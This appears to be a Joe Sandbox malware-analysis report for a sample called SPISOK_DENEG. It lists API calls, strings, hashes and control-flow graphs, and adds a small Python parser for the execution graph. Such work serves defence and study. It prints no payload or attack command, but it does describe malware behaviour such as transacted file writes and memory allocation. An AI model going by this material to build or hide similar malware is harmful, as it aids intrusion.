                                                              • Part of subcall function 000DA4ED: SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,000DA325,?,?,?,000DA175,?,00000001,00000000,?,?), ref: 000DA532
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1676868108.00000000000D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                                            • Associated: 00000000.00000002.1676841445.00000000000D0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1676934659.0000000000103000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1676956615.000000000010E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1676956615.0000000000115000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1676956615.0000000000132000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1677072682.0000000000133000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_d0000_SPISOK_DENEG.jbxd
                                                            Similarity
                                                            • API ID: File$Attributes$CloseFindH_prologTime_wcslen
                                                            • String ID: :
                                                            • API String ID: 3226429890-336475711
                                                            • Opcode ID: 5fe722c05cdc0dcf634d4694f04cfe14834bbc4b1754a5d1f444ae51d81a9f76
                                                            • Instruction ID: a91c32f25078959a8613fd2743f683594ca1b74d55577aed5014f17c3a0ef02b
                                                            • Opcode Fuzzy Hash: 5fe722c05cdc0dcf634d4694f04cfe14834bbc4b1754a5d1f444ae51d81a9f76
                                                            • Instruction Fuzzy Hash: A6417071804658A9EB35EB64DC59EEEB37CAF55300F0040A7B609A2293EB745F85CF71
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1676868108.00000000000D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                                            • Associated: 00000000.00000002.1676841445.00000000000D0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1676934659.0000000000103000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1676956615.000000000010E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1676956615.0000000000115000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1676956615.0000000000132000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1677072682.0000000000133000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_d0000_SPISOK_DENEG.jbxd
                                                            Similarity
                                                            • API ID: _wcslen
                                                            • String ID: }
                                                            • API String ID: 176396367-4239843852
                                                            • Opcode ID: bfd1885096d29489c5f713cdd1e8d41a3b5099d985a0b0f1ea0c4a40d6729413
                                                            • Instruction ID: 0d8adedfc36c20e19f67eef14b598fcbf358a105fbccf01bc3a49434a38db4b3
                                                            • Opcode Fuzzy Hash: bfd1885096d29489c5f713cdd1e8d41a3b5099d985a0b0f1ea0c4a40d6729413
                                                            • Instruction Fuzzy Hash: DE21087390578A5ED731EA65D845FBBB3ECDF50750F10042AF640E3142EB65DE4893A2
                                                            APIs
                                                              • Part of subcall function 000DF2C5: GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 000DF2E4
                                                              • Part of subcall function 000DF2C5: GetProcAddress.KERNEL32(001181C8,CryptUnprotectMemory), ref: 000DF2F4
                                                            • GetCurrentProcessId.KERNEL32(?,?,?,000DF33E), ref: 000DF3D2
                                                            Strings
                                                            • CryptProtectMemory failed, xrefs: 000DF389
                                                            • CryptUnprotectMemory failed, xrefs: 000DF3CA
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1676868108.00000000000D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                                            • Associated: 00000000.00000002.1676841445.00000000000D0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1676934659.0000000000103000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1676956615.000000000010E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1676956615.0000000000115000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1676956615.0000000000132000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1677072682.0000000000133000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_d0000_SPISOK_DENEG.jbxd
                                                            Similarity
                                                            • API ID: AddressProc$CurrentProcess
                                                            • String ID: CryptProtectMemory failed$CryptUnprotectMemory failed
                                                            • API String ID: 2190909847-396321323
                                                            • Opcode ID: 61c58150231d2d1e066fe26f9d97d30db395e03726fc96de734afdba614c2dfd
                                                            • Instruction ID: 3bf520d5e0f2f340e4d23b2da6224bfb78d6b0d5e96ae0a278a632f1abf7c199
                                                            • Opcode Fuzzy Hash: 61c58150231d2d1e066fe26f9d97d30db395e03726fc96de734afdba614c2dfd
                                                            • Instruction Fuzzy Hash: B811B431A0532AABDB156F20DD456BE3798FF04760B05C127FC525B392DB709F4186A0
                                                            APIs
                                                            • _swprintf.LIBCMT ref: 000DB9B8
                                                              • Part of subcall function 000D4092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 000D40A5
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1676868108.00000000000D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                                             • Associated: 00000000.00000002.1676841445.00000000000D0000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1676934659.0000000000103000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1676956615.000000000010E000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1676956615.0000000000115000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1676956615.0000000000132000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1677072682.0000000000133000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_d0000_SPISOK_DENEG.jbxd
                                                            Similarity
                                                            • API ID: __vswprintf_c_l_swprintf
                                                            • String ID: %c:\
                                                            • API String ID: 1543624204-3142399695
                                                            • Opcode ID: d4d55ed3f7b1ced72e3817a263ac6aa9b2803dffc555364feffdba09236f4c64
                                                            • Instruction ID: b0921349c8c7e72dd8ab38c2571aec2aa3891d43fbbe9c1cd8189bcd0187eeb3
                                                            • Opcode Fuzzy Hash: d4d55ed3f7b1ced72e3817a263ac6aa9b2803dffc555364feffdba09236f4c64
                                                            • Instruction Fuzzy Hash: E001F563500312B9DA706B398C42DBBB7ECEF957B0B55450BF644D6683EB30D84082B2
                                                            APIs
                                                            • CreateThread.KERNEL32(00000000,00010000,000E1160,?,00000000,00000000), ref: 000E1043
                                                            • SetThreadPriority.KERNEL32(?,00000000), ref: 000E108A
                                                              • Part of subcall function 000D6C36: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 000D6C54
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1676868108.00000000000D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                                             • Associated: 00000000.00000002.1676841445.00000000000D0000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1676934659.0000000000103000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1676956615.000000000010E000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1676956615.0000000000115000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1676956615.0000000000132000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1677072682.0000000000133000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_d0000_SPISOK_DENEG.jbxd
                                                            Similarity
                                                            • API ID: Thread$CreatePriority__vswprintf_c_l
                                                            • String ID: CreateThread failed
                                                            • API String ID: 2655393344-3849766595
                                                            • Opcode ID: 3689b8dca67fd1207ba033ba8355ae8a5802c5124faa2735dc8a6e1edf188f8b
                                                            • Instruction ID: 7a2dba2470977e294636d5239b16a9fe80a7e72be6b41ef2feadf12da73ee213
                                                            • Opcode Fuzzy Hash: 3689b8dca67fd1207ba033ba8355ae8a5802c5124faa2735dc8a6e1edf188f8b
                                                            • Instruction Fuzzy Hash: 7A0126B534034DBFD3346F25AC51BFAB399EB84350F20002EF686662C1CAF168C48230
                                                            APIs
                                                              • Part of subcall function 000DE2E8: _swprintf.LIBCMT ref: 000DE30E
                                                              • Part of subcall function 000DE2E8: _strlen.LIBCMT ref: 000DE32F
                                                              • Part of subcall function 000DE2E8: SetDlgItemTextW.USER32(?,0010E274,?), ref: 000DE38F
                                                              • Part of subcall function 000DE2E8: GetWindowRect.USER32(?,?), ref: 000DE3C9
                                                              • Part of subcall function 000DE2E8: GetClientRect.USER32(?,?), ref: 000DE3D5
                                                            • GetDlgItem.USER32(00000000,00003021), ref: 000D135A
                                                            • SetWindowTextW.USER32(00000000,001035F4), ref: 000D1370
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1676868108.00000000000D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                                             • Associated: 00000000.00000002.1676841445.00000000000D0000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1676934659.0000000000103000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1676956615.000000000010E000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1676956615.0000000000115000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1676956615.0000000000132000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1677072682.0000000000133000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_d0000_SPISOK_DENEG.jbxd
                                                            Similarity
                                                            • API ID: ItemRectTextWindow$Client_strlen_swprintf
                                                            • String ID: 0
                                                            • API String ID: 2622349952-4108050209
                                                            • Opcode ID: c1bb83b40acee9c8b44ec71bacd51b9f650a7f27bcd425e1f319b0c0ec3be635
                                                            • Instruction ID: c9ad035971c550b35ceb9d9ea5f49350f05157a42274b4cdf042b1dbc90b3f08
                                                            • Opcode Fuzzy Hash: c1bb83b40acee9c8b44ec71bacd51b9f650a7f27bcd425e1f319b0c0ec3be635
                                                            • Instruction Fuzzy Hash: 6EF04F3010438CBADF555F61CC0DBEA3B99AF44345F088116FD9455AE1CF78CAD0EA60
                                                            APIs
                                                            • WaitForSingleObject.KERNEL32(?,000000FF,000E1206,?), ref: 000E0FEA
                                                            • GetLastError.KERNEL32(?), ref: 000E0FF6
                                                              • Part of subcall function 000D6C36: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 000D6C54
                                                            Strings
                                                            • WaitForMultipleObjects error %d, GetLastError %d, xrefs: 000E0FFF
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1676868108.00000000000D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                                             • Associated: 00000000.00000002.1676841445.00000000000D0000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1676934659.0000000000103000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1676956615.000000000010E000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1676956615.0000000000115000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1676956615.0000000000132000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1677072682.0000000000133000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_d0000_SPISOK_DENEG.jbxd
                                                            Similarity
                                                            • API ID: ErrorLastObjectSingleWait__vswprintf_c_l
                                                            • String ID: WaitForMultipleObjects error %d, GetLastError %d
                                                            • API String ID: 1091760877-2248577382
                                                            • Opcode ID: ebd61d762bf58dcc6edaa4e4ff3815de1bf550febfa90d431b9165d03ad9ee9a
                                                            • Instruction ID: 1bf99437cd0d03ad4588cec23cdd5e9fa5dba85eab52a5c157370e7f0f53f7b8
                                                            • Opcode Fuzzy Hash: ebd61d762bf58dcc6edaa4e4ff3815de1bf550febfa90d431b9165d03ad9ee9a
                                                            • Instruction Fuzzy Hash: 73D02B715052307BC61033245D05DFE78089B12331F504715F178643E6CB6109C142A1
                                                            APIs
                                                            • GetModuleHandleW.KERNEL32(00000000,?,000DDA55,?), ref: 000DE2A3
                                                            • FindResourceW.KERNEL32(00000000,RTL,00000005,?,000DDA55,?), ref: 000DE2B1
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1676868108.00000000000D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                                             • Associated: 00000000.00000002.1676841445.00000000000D0000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1676934659.0000000000103000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1676956615.000000000010E000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1676956615.0000000000115000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1676956615.0000000000132000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1677072682.0000000000133000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_d0000_SPISOK_DENEG.jbxd
                                                            Similarity
                                                            • API ID: FindHandleModuleResource
                                                            • String ID: RTL
                                                            • API String ID: 3537982541-834975271
                                                            • Opcode ID: 42077494628b4eb589390538c8d7eff03e461f6073ac2e038b8e13ed31065628
                                                            • Instruction ID: 361d9c1de5716eba59c6998ea3ea6cd65fb244953207c6dec65d33e7f562d0eb
                                                            • Opcode Fuzzy Hash: 42077494628b4eb589390538c8d7eff03e461f6073ac2e038b8e13ed31065628
                                                            • Instruction Fuzzy Hash: C2C01231242750A6EA302766AC4DB836A9C5B00B51F090449B2D1EA6D9DAE5C98086A0

                                                            Execution Graph

                                                            Execution Coverage:13.8%
                                                            Dynamic/Decrypted Code Coverage:100%
                                                            Signature Coverage:0%
                                                            Total number of Nodes:24
                                                            Total number of Limit Nodes:2
                                                             execution_graph (flattened node and edge list of the rendered graph; nodes are given by address, API-calling nodes are labelled):
                                                             • 7ffd9ba09edd -> 7ffd9ba09eff WriteFile -> 7ffd9ba09fc7
                                                             • 7ffd9ba09d6e -> 7ffd9ba09d7d CreateFileTransactedW -> 7ffd9ba09eaa
                                                             • 7ffd9ba0a0e1 -> 7ffd9ba0a0eb -> {7ffd9ba0a177, 7ffd9ba08db8}; 7ffd9ba08db8 -> 7ffd9ba0a930 -> {7ffd9ba0a9e9, 7ffd9ba08b98}; 7ffd9ba08b98 -> 7ffd9ba0aca0 -> {7ffd9ba0ada3, 7ffd9ba0af73 GetSystemInfo}; 7ffd9ba0af73 -> 7ffd9ba0afae -> 7ffd9ba0a9e9; 7ffd9ba0ada3 -> 7ffd9ba0a9e9 -> 7ffd9ba0a16b
                                                             • 7ffd9bb7727d -> 7ffd9bb77283 QueryFullProcessImageNameA -> 7ffd9bb77444
                                                             • 7ffd9ba0b1d4 -> 7ffd9ba0b1dd VirtualAlloc -> 7ffd9ba0b298
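The execution graph is emitted by Joe Sandbox as one flattened token stream in place of the rendered picture, and it stores only direct edges, so seeing which Win32 API a given entry point can actually reach means tracing by hand. The parser below is an added example written for this page; it is not Joe Sandbox code and not part of the sample. It assumes the token layout visible in the raw line (a decimal node id, then that node's address, then zero or more API labels, with `id->id` edge tokens interleaved anywhere), rebuilds the graph, and reports the APIs transitively reachable from every entry point (node with no incoming edge). The sample input is the process 4 (ChainPortsurrogate) execution_graph line copied from this report.

```python
"""Parse a Joe Sandbox 'execution_graph' token stream and summarize it.

Added illustration for this report page (not Joe Sandbox tooling). The only
format assumption is the one visible in the raw line: '<id> <addr> [Api ...]'
per node, with '<id>-><id>' edge tokens interleaved.
"""
import re
from collections import defaultdict

# Copied verbatim from this report (PID 4, ChainPortsurrogate snapshots) so the
# summary can be checked against the raw line by eye.
EXECUTION_GRAPH = (
    "execution_graph 13673 7ffd9ba09edd 13674 7ffd9ba09eff WriteFile 13673->13674 "
    "13676 7ffd9ba09fc7 13674->13676 13669 7ffd9ba09d6e 13670 7ffd9ba09d7d "
    "CreateFileTransactedW 13669->13670 13672 7ffd9ba09eaa 13670->13672 "
    "13677 7ffd9ba0a0e1 13678 7ffd9ba0a0eb 13677->13678 13681 7ffd9ba0a177 "
    "13678->13681 13682 7ffd9ba08db8 13678->13682 13680 7ffd9ba0a16b "
    "13684 7ffd9ba0a930 13682->13684 13683 7ffd9ba0a9e9 13683->13680 13684->13683 "
    "13686 7ffd9ba08b98 13684->13686 13688 7ffd9ba0aca0 13686->13688 "
    "13687 7ffd9ba0ada3 13687->13683 13688->13687 13689 7ffd9ba0af73 GetSystemInfo "
    "13688->13689 13690 7ffd9ba0afae 13689->13690 13690->13683 13695 7ffd9bb7727d "
    "13696 7ffd9bb77283 QueryFullProcessImageNameA 13695->13696 13698 7ffd9bb77444 "
    "13696->13698 13691 7ffd9ba0b1d4 13692 7ffd9ba0b1dd VirtualAlloc 13691->13692 "
    "13694 7ffd9ba0b298 13692->13694"
)

_EDGE = re.compile(r"^(\d+)->(\d+)$")
_NODE_ID = re.compile(r"^\d+$")


def parse_execution_graph(line):
    """Return (nodes, edges): nodes = {id: {"addr": str, "apis": [str]}},
    edges = [(src_id, dst_id)].

    The token right after a node id is consumed unconditionally as its address,
    so an all-digit address such as 00401000 cannot be mistaken for a new id.
    """
    tokens = line.split()
    if tokens and tokens[0] == "execution_graph":
        tokens = tokens[1:]
    nodes, edges = {}, []
    current, expect_addr = None, False
    for tok in tokens:
        if expect_addr:
            nodes[current]["addr"] = tok
            expect_addr = False
            continue
        m = _EDGE.match(tok)
        if m:
            edges.append((int(m.group(1)), int(m.group(2))))
        elif _NODE_ID.match(tok):
            current = int(tok)
            nodes[current] = {"addr": None, "apis": []}
            expect_addr = True
        elif current is not None:
            nodes[current]["apis"].append(tok)  # API label for the current node
        else:
            raise ValueError("label before any node: %r" % tok)
    return nodes, edges


def roots(nodes, edges):
    """Addresses of nodes with no incoming edge: the graph's entry points."""
    targets = {dst for _, dst in edges}
    return sorted(n["addr"] for nid, n in nodes.items() if nid not in targets)


def reachable_apis(nodes, edges, root_addr):
    """APIs on every node reachable from root_addr, first-seen order, no repeats."""
    by_addr = {n["addr"]: nid for nid, n in nodes.items()}
    succ = defaultdict(list)
    for src, dst in edges:
        succ[src].append(dst)
    seen, out, stack = set(), [], [by_addr[root_addr]]
    while stack:
        nid = stack.pop()
        if nid in seen:
            continue
        seen.add(nid)
        for api in nodes[nid]["apis"]:
            if api not in out:
                out.append(api)
        stack.extend(reversed(succ[nid]))  # keep left-to-right edge order
    return out


def summarize(line):
    """Map each entry point to the APIs it can transitively reach."""
    nodes, edges = parse_execution_graph(line)
    return {r: reachable_apis(nodes, edges, r) for r in roots(nodes, edges)}


if __name__ == "__main__":
    for root, apis in summarize(EXECUTION_GRAPH).items():
        print(root, "->", ", ".join(apis) or "(no API call reachable)")
```

On this report's line the summary shows five entry points, and that 7ffd9ba0a0e1 reaches GetSystemInfo only through 7ffd9ba08db8 and 7ffd9ba08b98, three calls deep. It also makes visible that the CreateFileTransactedW and WriteFile nodes hang off separate entry points, so the graph alone does not tell you whether the transacted handle is the one being written; that question has to be answered from the control-flow graphs or the memory dump, not from this node list.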

                                                            Control-flow Graph

                                                             control_flow_graph for 7ffd9ba08b98 (basic blocks numbered 714-784 by the plugin; entry block 714 7ffd9ba08b98-7ffd9ba0acb3; blocks with no successor: 743 7ffd9ba0ada3-7ffd9ba0aebf, 758 7ffd9ba0ae84-7ffd9ba0aeaa, 782 7ffd9ba0afb4-7ffd9ba0afd5). Blocks that call out:
                                                             • 739 7ffd9ba0acea-7ffd9ba0acfb call 7ffd9ba08cd8 -> 716
                                                             • 748 7ffd9ba0adad-7ffd9ba0adbb call 7ffd9ba08ba0 -> 754
                                                             • 756 7ffd9ba0adc8-7ffd9ba0adea call 7ffd9ba08cf8 -> 747, 771
                                                             • 761 7ffd9ba0ae1b-7ffd9ba0ae34 call 7ffd9ba08ba8 -> 752, 772
                                                             • 772 7ffd9ba0ae36-7ffd9ba0ae58 call 7ffd9ba08cf8 -> 755, 780
                                                             • 764 7ffd9ba0af1b-7ffd9ba0afac GetSystemInfo (reached from 757 7ffd9ba0aec0-7ffd9ba0aecc and 783 7ffd9ba0af11-7ffd9ba0af1a) -> 781 7ffd9ba0afae, 782
                                                             The remaining blocks are plain conditional branches between these.
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1813309860.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_7ffd9ba00000_ChainPortsurrogate.jbxd
                                                            Similarity
                                                            • API ID: InfoSystem
                                                            • String ID:
                                                            • API String ID: 31276548-0
                                                            • Opcode ID: db693d58fd53a3edad99f78d7300ad288c0950163b9e3daca03d1e1c59b517eb
                                                            • Instruction ID: a4f0076cf48a6d87dd7c226371d181ed6a5a52bab48db3944422e2fe0a1a3e45
                                                            • Opcode Fuzzy Hash: db693d58fd53a3edad99f78d7300ad288c0950163b9e3daca03d1e1c59b517eb
                                                            • Instruction Fuzzy Hash: 27C13531B0DE0D4FE768D75CD4656B977E1EB9A320F05427ED08EC32B2DDA9A9028781

                                                            Control-flow Graph

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1814876455.00007FFD9BB70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB70000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_7ffd9bb70000_ChainPortsurrogate.jbxd
                                                            Similarity
                                                            • API ID: FullImageNameProcessQuery
                                                            • String ID:
                                                            • API String ID: 3578328331-0
                                                            • Opcode ID: 193c8ce99d5128a697679c4f77eb5abe7caa3ee621030492c8fad593be02132a
                                                            • Instruction ID: 488d369b918afb187438331073995d478a0ec355f192a8c74d2e88f6e8ae17fe
                                                            • Opcode Fuzzy Hash: 193c8ce99d5128a697679c4f77eb5abe7caa3ee621030492c8fad593be02132a
                                                            • Instruction Fuzzy Hash: 4481D231608A8D8FDB68DF28C8957F937E1FB59315F10427EE84EC7292CB74A9418B81

                                                            Control-flow Graph

                                                             control_flow_graph for 7ffd9ba09d6e (blocks 816-825):
                                                             • 816 7ffd9ba09d6e-7ffd9ba09d7b -> 817, 818
                                                             • 817 7ffd9ba09d7d-7ffd9ba09d85 -> 818
                                                             • 818 7ffd9ba09d86-7ffd9ba09e22 -> 822, 823
                                                             • 822 7ffd9ba09e24-7ffd9ba09e29 -> 823
                                                             • 823 7ffd9ba09e2c-7ffd9ba09ea8 CreateFileTransactedW -> 824, 825
                                                             • 824 7ffd9ba09eb0-7ffd9ba09eda (no successor)
                                                             • 825 7ffd9ba09eaa -> 824
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1813309860.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_7ffd9ba00000_ChainPortsurrogate.jbxd
                                                            Similarity
                                                            • API ID: CreateFileTransacted
                                                            • String ID:
                                                            • API String ID: 2149338676-0
                                                            • Opcode ID: f5fba847d123d82373bfc8ef1bdbfff3c21856b086d5bfd87f7783db28a81781
                                                            • Instruction ID: ce04ddacc13e274a29f37a34ffb4e0213cf6ee3ab80b52a5179760cdf7905d48
                                                            • Opcode Fuzzy Hash: f5fba847d123d82373bfc8ef1bdbfff3c21856b086d5bfd87f7783db28a81781
                                                            • Instruction Fuzzy Hash: AC51F83090DB888FDB55DF5CD855AA97BF0EF6A320F14429FE089D3252C775A845C782

                                                            Control-flow Graph

                                                             control_flow_graph for 7ffd9ba09edd (blocks 827-834):
                                                             • 827 7ffd9ba09edd-7ffd9ba09f71 -> 831, 832
                                                             • 831 7ffd9ba09f73-7ffd9ba09f78 -> 832
                                                             • 832 7ffd9ba09f7b-7ffd9ba09fc5 WriteFile -> 833, 834
                                                             • 833 7ffd9ba09fcd-7ffd9ba09ff5 (no successor)
                                                             • 834 7ffd9ba09fc7 -> 833
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1813309860.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_7ffd9ba00000_ChainPortsurrogate.jbxd
                                                            Similarity
                                                            • API ID: FileWrite
                                                            • String ID:
                                                            • API String ID: 3934441357-0
                                                            • Opcode ID: e59cd9f01e76e2421326a7235b7bf131f754713e0b9573d3186325ea6faedc91
                                                            • Instruction ID: 6061d15345e40c5a7396260fb7c42167cb75b115cf05ac2048c22e3145cb8f30
                                                            • Opcode Fuzzy Hash: e59cd9f01e76e2421326a7235b7bf131f754713e0b9573d3186325ea6faedc91
                                                            • Instruction Fuzzy Hash: B841B13190CA4C8FDB58DF58D8596B9BBF1FB99311F04826FD049D3292CB75A845CB81

                                                            Control-flow Graph

                                                             control_flow_graph for 7ffd9ba0af18 (blocks 835-841):
                                                             • 835 7ffd9ba0af18-7ffd9ba0af6b -> 839
                                                             • 839 7ffd9ba0af73-7ffd9ba0afac GetSystemInfo -> 840, 841
                                                             • 840 7ffd9ba0afae -> 841
                                                             • 841 7ffd9ba0afb4-7ffd9ba0afd5 (no successor)
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1813309860.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_7ffd9ba00000_ChainPortsurrogate.jbxd
                                                            Similarity
                                                            • API ID: InfoSystem
                                                            • String ID:
                                                            • API String ID: 31276548-0
                                                            • Opcode ID: bc6df7009d8d6592cd7d3c350ee64d4ecb59f3b1116017453c2ad78183ef039f
                                                            • Instruction ID: 9881862933b5deda37bb52bf67c6de1ad4c564ecfce325aba9e255cc990f9946
                                                            • Opcode Fuzzy Hash: bc6df7009d8d6592cd7d3c350ee64d4ecb59f3b1116017453c2ad78183ef039f
                                                            • Instruction Fuzzy Hash: 13219C71A08A0C9FDB58EB98C849AE9BBF1FB95311F00422ED04AD3261DB7168568B80

                                                            Control-flow Graph

                                                             control_flow_graph for 7ffd9ba0b1d4 (blocks 941-948):
                                                             • 941 7ffd9ba0b1d4-7ffd9ba0b1db -> 942, 943
                                                             • 942 7ffd9ba0b1dd-7ffd9ba0b1e5 -> 943
                                                             • 943 7ffd9ba0b1e6-7ffd9ba0b296 VirtualAlloc -> 947, 948
                                                             • 947 7ffd9ba0b29e-7ffd9ba0b2c6 (no successor)
                                                             • 948 7ffd9ba0b298 -> 947
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1813309860.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_7ffd9ba00000_ChainPortsurrogate.jbxd
                                                            Similarity
                                                            • API ID: AllocVirtual
                                                            • String ID:
                                                            • API String ID: 4275171209-0
                                                            • Opcode ID: 809c19fadd9e3785e7a309e7909803191bcb0504fbc603b9aa5c83350aafa2f8
                                                            • Instruction ID: bcb01a55c26e8e45cfb6f4fc74c835c169402b64248a07b3ce6ee17248af39b7
                                                            • Opcode Fuzzy Hash: 809c19fadd9e3785e7a309e7909803191bcb0504fbc603b9aa5c83350aafa2f8
                                                            • Instruction Fuzzy Hash: A4310B31A0CA4C4FDB18EB6C98466F97BF1EB56321F04426FD05DD3192DE756816C781
                                                            Memory Dump Source
                                                            • Source File: 00000008.00000002.1857347262.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_8_2_7ffd9ba00000_ctfmon.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 2b0dabde63694ffb86f1afed21fa20f12ce67f85b909b7b237b086b3f7b391eb
                                                            • Instruction ID: 52a29170bf02ec3f1396f7ce4a949d8bc3867589c3707990084dda4208d7b923
                                                            • Opcode Fuzzy Hash: 2b0dabde63694ffb86f1afed21fa20f12ce67f85b909b7b237b086b3f7b391eb
                                                            • Instruction Fuzzy Hash: E7C15A20B0E68A0FE769AB7884652F57BD1EF67310F1640BEE4CAC71E7DD5DA8428341
                                                            Memory Dump Source
